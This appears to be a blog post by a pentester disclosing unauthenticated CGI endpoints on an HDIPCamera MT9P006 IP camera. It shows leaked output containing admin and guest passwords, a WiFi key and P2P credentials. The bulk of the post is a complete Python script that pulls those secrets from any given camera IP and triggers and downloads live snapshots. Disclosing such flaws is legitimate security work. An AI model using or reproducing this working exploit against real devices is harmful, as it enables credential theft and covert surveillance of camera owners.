I pentested a camera, finding numerous vulnerabilities.
Product info:
HDIPCamera MT9P006
Version 1.0.1.2 (Dec 4 2015)
1/2.5-Inch 5 Mp CMOS Digital Image Sensor
Boardtype: 5300
sensortype: mt9p006
found in applications like:
• Digital still cameras
• Digital video cameras
• PC cameras
• Converged DSCs/camcorders
• Cellular phones
• PDAs
Let’s have a look. 😉
by just examining the source I found a few unprotected cgi requests.
A few importants cgi request can be used without any authorisation.
First getting some basic info
var serialNum="VVVIPCxxxxxxxxxxxx-xxxxxxxxxxxxx";
var model="RT_IPC"; var hardVersion="5300-mt9p006";
var softVersion="V2.3.5.2505-S50-SMA-B20151204B";
var ipcname="IPCAM";
var startdate="2016-8-30 21:56:44";
var runtimes="0 day, 1:58";
var sdstatus="out";
var sdfreespace="0 ";
var sdtotalspace="0 ";
var builddate="Dec 4 2015 ";
var productmodel="null";
var vendor="RTJ";
var swver="";
var hwver="";
var mppver="mpp";
P2P info
var p2p_enable = "1";
var p2p_id = "PPIV-xxxxx-WZDZZ";
var p2p_pwd = "xxx";
Wifi info
var wifissid = "xxx";
var wifikeytype = "3";
var wifiwhichkey = "0";
var wifikey="xxxxxxxxxxxxxxxx";
var wifienable="0";
var wifimac="xx:xx:xx:xx:xx:xx";
var wifienable="0";
var linkstatus="0";
var linkssid="";
var wifimode="";
rtsp info
var rtsplisnport="554";
var onvif_http_port="1018";
var rtsp_user_verify="0";
User info (Including passwords)
var name0="admin";
var password0="admin";
var authLevel0="255";
var name1="guest";
var password1="guest";
var authLevel1="3";
var name2="xxx";
var password2="xxx";
var authLevel2="3";
var name3="xxx";
var password3="xxx";
var authLevel3="3";
var name4="";
var password4="";
var authLevel4="3";
var name5="";
var password5="";
var authLevel5="3";
var name6="";
var password6="";
var authLevel6="3";
var name7="";
var password7="";
var authLevel7="3";
var name8="";
var password8="";
var authLevel8="0";
var name9="";
var password9="";
var authLevel9="0";
It’s getting even better.
A world readable url with all the snapshots taken.
Ow wait.. let’s make some snapshots..
outputs:
var path=”/tmpfs/snap_tmpfs/20160831/IMG001/IMG_chn0_TIMER_MNG_20160831230808_001.jpg”
.. a freshly made snapshot.
I made a python script to make use of these cgi’s and outputs all the info.
And to make a snapshot and save it to local.
#!/bin/python
# Quick & Dirty tool
# Get all the info from the IPcam 5300 MT9P006
#
# Use commandline parameters to retrieve all kinds of info
#
# usage for all the info
# python IPcam_5300-mt9p006.py --ip <ip> --snapshot --getp2p --getwifi --getrtsp --getusers
import urllib
import urllib2
import re
import argparse
p2p="/cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get"
wifi="/cgi-bin/getwifiattr.cgi"
rtsp="/cgi-bin/hi3510/getrtsplisnport.cgi"
snap="/web/cgi-bin/hi3510/param.cgi?cmd=snap"
snap_dir="/tmpfs/snap_tmpfs/"
users="/web/cgi-bin/hi3510/param.cgi?cmd=getuser"
def get_param():
print "./IPcam_5300-mt9p600.py -h for cmd options"
try:
parser = argparse.ArgumentParser()
parser.add_argument("--ip", dest="ip", default="", help="ip adres", required=True)
parser.add_argument("--snapshot", dest="snapshot", action="store_true", help="make and download snapshot")
parser.add_argument("--getp2p", dest="getp2p", action="store_true", help="get p2p info (incl. password)")
parser.add_argument("--getwifi", dest="getwifi", action="store_true", help="get wifi info (incl. password)")
parser.add_argument("--getrtsp", dest="getrtsp", action="store_true", help="get rtsp info")
parser.add_argument("--getusers", dest="getusers", action="store_true", help="get user info (incl. passwords)")
args = parser.parse_args()
return args
except IOError, msg:
parser.error(str(msg))
def main():
params = get_param()
if params.snapshot:
# call cgi to make snapshot and save to local drive
print "make and download snapshot\n"
req = urllib2.Request("http://"+params.ip+snap)
url_data = urllib2.urlopen(req).read()
match = re.search(r"/(.*)", url_data)
snapfile_path = match.group(0)
# remove last 2 char " and \n
snapfile_path = snapfile_path[:-2]
match = re.search(r"IMG_(.*).jpg", snapfile_path)
snap_filename = match.group(0)
print "Snap file url: %s" % snapfile_path
print "Save output to: %s " % snap_filename
cmd="http://" + params.ip + snapfile_path
req1 = urllib2.Request(cmd)
f = open(snap_filename, "wb")
f.write(urllib2.urlopen(req1).read())
f.close()
if params.getp2p:
print "Get p2p info"
req = urllib2.Request("http://" + params.ip + p2p)
url_data = urllib2.urlopen(req).read()
print url_data
if params.getwifi:
print "Get wifi info"
req = urllib2.Request("http://" + params.ip + wifi)
url_data = urllib2.urlopen(req).read()
print url_data
if params.getrtsp:
print "Get rtsp info"
req = urllib2.Request("http://" + params.ip + rtsp)
url_data = urllib2.urlopen(req).read()
print url_data
if params.getusers:
print "Get users info"
req = urllib2.Request("http://" + params.ip + users)
url_data = urllib2.urlopen(req).read()
print url_data
if __name__ == "__main__":
main()